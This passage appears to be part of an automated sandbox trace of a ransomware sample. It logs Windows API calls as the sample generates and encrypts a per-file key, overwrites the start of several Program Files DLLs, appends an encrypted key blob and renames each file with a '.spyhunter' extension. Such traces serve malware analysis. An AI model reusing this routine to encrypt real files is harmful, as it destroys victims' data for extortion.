lpOverlapped=0x0) returned 1 [0112.870] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.870] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f73c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f73c*=0x2800, lpOverlapped=0x0) returned 1 [0112.870] GetProcessHeap () returned 0x2c0000 [0112.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0112.870] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.871] WriteFile (in: hFile=0x158, lpBuffer=0x270f77c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f73c, lpOverlapped=0x0 | out: lpBuffer=0x270f77c*, lpNumberOfBytesWritten=0x270f73c*=0x4, lpOverlapped=0x0) returned 1 [0113.015] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f73c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f73c*=0x30, lpOverlapped=0x0) returned 1 [0113.015] CloseHandle (hObject=0x158) returned 1 [0113.015] GetProcessHeap () returned 0x2c0000 [0113.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0113.015] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Microsoft.Synchronization.dll.spyhunter") returned 102 [0113.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Microsoft.Synchronization.dll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\microsoft.synchronization.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Microsoft.Synchronization.dll.spyhunter" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\microsoft.synchronization.dll.spyhunter")) returned 1 [0113.016] GetProcessHeap () returned 0x2c0000 [0113.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0113.016] GetProcessHeap () returned 0x2c0000 [0113.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0113.016] GetProcessHeap () returned 0x2c0000 [0113.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9c40 | out: hHeap=0x2c0000) returned 1 [0113.016] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f780 | out: pbBuffer=0x270f780) returned 1 [0113.016] GetProcessHeap () returned 0x2c0000 [0113.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0113.017] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f778*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f778*=0x30) returned 1 [0113.017] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.server.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0113.038] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll") returned 110 [0113.038] StrStrW (lpFirst="Microsoft.Synchronization.Data.Server.dll", lpSrch=".txt") returned 0x0 [0113.038] GetProcessHeap () returned 0x2c0000 [0113.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0113.038] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f73c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f73c*=0x2800, lpOverlapped=0x0) returned 1 [0113.059] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.060] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f73c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f73c*=0x2800, lpOverlapped=0x0) returned 1 [0113.060] GetProcessHeap () returned 0x2c0000 [0113.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0113.061] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.061] WriteFile (in: hFile=0x158, lpBuffer=0x270f77c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f73c, lpOverlapped=0x0 | out: lpBuffer=0x270f77c*, lpNumberOfBytesWritten=0x270f73c*=0x4, lpOverlapped=0x0) returned 1 [0113.083] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f73c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f73c*=0x30, lpOverlapped=0x0) returned 1 [0113.083] CloseHandle (hObject=0x158) returned 1 [0113.083] GetProcessHeap () returned 0x2c0000 [0113.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0113.083] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll.spyhunter") returned 120 [0113.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.server.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll.spyhunter" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.server.dll.spyhunter")) returned 1 [0113.084] GetProcessHeap () returned 0x2c0000 [0113.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0113.084] GetProcessHeap () returned 0x2c0000 [0113.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0113.084] GetProcessHeap () returned 0x2c0000 [0113.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cecd00 | out: hHeap=0x2c0000) returned 1 [0113.084] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f778 | out: pbBuffer=0x270f778) returned 1 [0113.084] GetProcessHeap () returned 0x2c0000 [0113.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0113.084] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f770*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f770*=0x30) returned 1 [0113.085] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0113.085] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll") returned 103 [0113.085] StrStrW (lpFirst="Microsoft.Synchronization.Data.dll", lpSrch=".txt") returned 0x0 [0113.085] GetProcessHeap () returned 0x2c0000 [0113.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0113.085] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f734, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f734*=0x2800, lpOverlapped=0x0) returned 1 [0113.087] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.088] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f734, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f734*=0x2800, lpOverlapped=0x0) returned 1 [0113.088] GetProcessHeap () returned 0x2c0000 [0113.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0113.088] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.088] WriteFile (in: hFile=0x158, lpBuffer=0x270f774*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f734, lpOverlapped=0x0 | out: lpBuffer=0x270f774*, lpNumberOfBytesWritten=0x270f734*=0x4, lpOverlapped=0x0) returned 1 [0113.092] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f734, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f734*=0x30, lpOverlapped=0x0) returned 1 [0113.092] CloseHandle (hObject=0x158) returned 1 [0113.092] GetProcessHeap () returned 0x2c0000 [0113.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0113.092] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll.spyhunter") returned 113 [0113.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll.spyhunter" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.dll.spyhunter")) returned 1 [0113.093] GetProcessHeap () returned 0x2c0000 [0113.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0113.093] GetProcessHeap () returned 0x2c0000 [0113.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0113.093] GetProcessHeap () returned 0x2c0000 [0113.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9588 | out: hHeap=0x2c0000) returned 1 [0113.097] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f768 | out: pbBuffer=0x270f768) returned 1 [0113.097] GetProcessHeap () returned 0x2c0000 [0113.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0113.097] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f760*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f760*=0x30) returned 1 [0113.097] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Synchronization.dll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\synchronization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0113.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Synchronization.dll") returned 82 [0113.133] StrStrW (lpFirst="Synchronization.dll", lpSrch=".txt") returned 0x0 [0113.134] GetProcessHeap () returned 0x2c0000 [0113.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0113.134] ReadFile (in: hFile=0xcc, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f724, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f724*=0x2800, lpOverlapped=0x0) returned 1 [0113.158] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.158] WriteFile (in: hFile=0xcc, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f724, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f724*=0x2800, lpOverlapped=0x0) returned 1 [0113.158] GetProcessHeap () returned 0x2c0000 [0113.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0113.158] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.158] WriteFile (in: hFile=0xcc, lpBuffer=0x270f764*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f724, lpOverlapped=0x0 | out: lpBuffer=0x270f764*, lpNumberOfBytesWritten=0x270f724*=0x4, lpOverlapped=0x0) returned 1 [0113.192] WriteFile (in: hFile=0xcc, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f724, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f724*=0x30, lpOverlapped=0x0) returned 1 [0113.192] CloseHandle (hObject=0xcc) returned 1 [0113.192] GetProcessHeap () returned 0x2c0000 [0113.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0113.193] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Synchronization.dll.spyhunter") returned 92 [0113.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Synchronization.dll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\synchronization.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Synchronization.dll.spyhunter" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\synchronization.dll.spyhunter")) returned 1 [0113.193] GetProcessHeap () returned 0x2c0000 [0113.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0113.193] GetProcessHeap () returned 0x2c0000 [0113.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0113.193] GetProcessHeap () returned 0x2c0000 [0113.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2e820 | out: hHeap=0x2c0000) returned 1 [0113.193] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f760 | out: pbBuffer=0x270f760) returned 1 [0113.194] GetProcessHeap () returned 0x2c0000 [0113.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0113.194] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f758*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f758*=0x30) returned 1 [0113.194] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.contract.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.213] GetProcessHeap () returned 0x2c0000 [0113.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0113.213] GetProcessHeap () returned 0x2c0000 [0113.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c618 | out: hHeap=0x2c0000) returned 1 [0113.222] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f758 | out: pbBuffer=0x270f758) returned 1 [0113.222] GetProcessHeap () returned 0x2c0000 [0113.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0113.222] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f750*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f750*=0x30) returned 1 [0113.222] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcese35.dll" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlcese35.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0113.224] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcese35.dll") returned 76 [0113.225] StrStrW (lpFirst="sqlcese35.dll", lpSrch=".txt") returned 0x0 [0113.225] GetProcessHeap () returned 0x2c0000 [0113.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0113.225] ReadFile (in: hFile=0x15c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f714*=0x2800, lpOverlapped=0x0) returned 1 [0113.294] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.294] WriteFile (in: hFile=0x15c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f714*=0x2800, lpOverlapped=0x0) returned 1 [0113.294] GetProcessHeap () returned 0x2c0000 [0113.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0113.294] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.294] WriteFile (in: hFile=0x15c, lpBuffer=0x270f754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f714, lpOverlapped=0x0 | out: lpBuffer=0x270f754*, lpNumberOfBytesWritten=0x270f714*=0x4, lpOverlapped=0x0) returned 1 [0113.315] WriteFile (in: hFile=0x15c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f714, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f714*=0x30, lpOverlapped=0x0) returned 1 [0113.315] CloseHandle (hObject=0x15c) returned 1 [0113.315] GetProcessHeap () returned 0x2c0000 [0113.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0113.315] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcese35.dll.spyhunter") returned 86 [0113.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcese35.dll" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlcese35.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcese35.dll.spyhunter" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlcese35.dll.spyhunter")) returned 1 [0113.316] GetProcessHeap () returned 0x2c0000 [0113.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0113.316] GetProcessHeap () returned 0x2c0000 [0113.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0113.316] GetProcessHeap () returned 0x2c0000 [0113.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cd52f0 | out: hHeap=0x2c0000) returned 1 [0113.487] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f750 | out: pbBuffer=0x270f750) returned 1 [0113.487] GetProcessHeap () returned 0x2c0000 [0113.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0113.488] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f748*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f748*=0x30) returned 1 [0113.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\flyout.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.490] GetProcessHeap () returned 0x2c0000 [0113.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0113.490] GetProcessHeap () returned 0x2c0000 [0113.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ccc8c0 | out: hHeap=0x2c0000) returned 1 [0113.491] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f748 | out: pbBuffer=0x270f748) returned 1 [0113.491] GetProcessHeap () returned 0x2c0000 [0113.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0113.492] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f740*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f740*=0x30) returned 1 [0113.492] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\gadget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.656] GetProcessHeap () returned 0x2c0000 [0113.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0113.656] GetProcessHeap () returned 0x2c0000 [0113.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e18978 | out: hHeap=0x2c0000) returned 1 [0113.718] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f740 | out: pbBuffer=0x270f740) returned 1 [0113.718] GetProcessHeap () returned 0x2c0000 [0113.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0113.719] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f738*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f738*=0x30) returned 1 [0113.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\settings.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\settings.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.760] GetProcessHeap () returned 0x2c0000 [0113.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0113.760] GetProcessHeap () returned 0x2c0000 [0113.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e18888 | out: hHeap=0x2c0000) returned 1 [0113.760] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f738 | out: pbBuffer=0x270f738) returned 1 [0113.760] GetProcessHeap () returned 0x2c0000 [0113.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0113.760] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f730*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f730*=0x30) returned 1 [0113.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\main.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\main.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.857] GetProcessHeap () returned 0x2c0000 [0113.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0113.858] GetProcessHeap () returned 0x2c0000 [0113.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x2c0000) returned 1 [0113.858] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f738 | out: pbBuffer=0x270f738) returned 1 [0113.858] GetProcessHeap () returned 0x2c0000 [0113.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0113.858] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f730*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f730*=0x30) returned 1 [0113.858] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\flyout.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\css\\flyout.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.858] GetProcessHeap () returned 0x2c0000 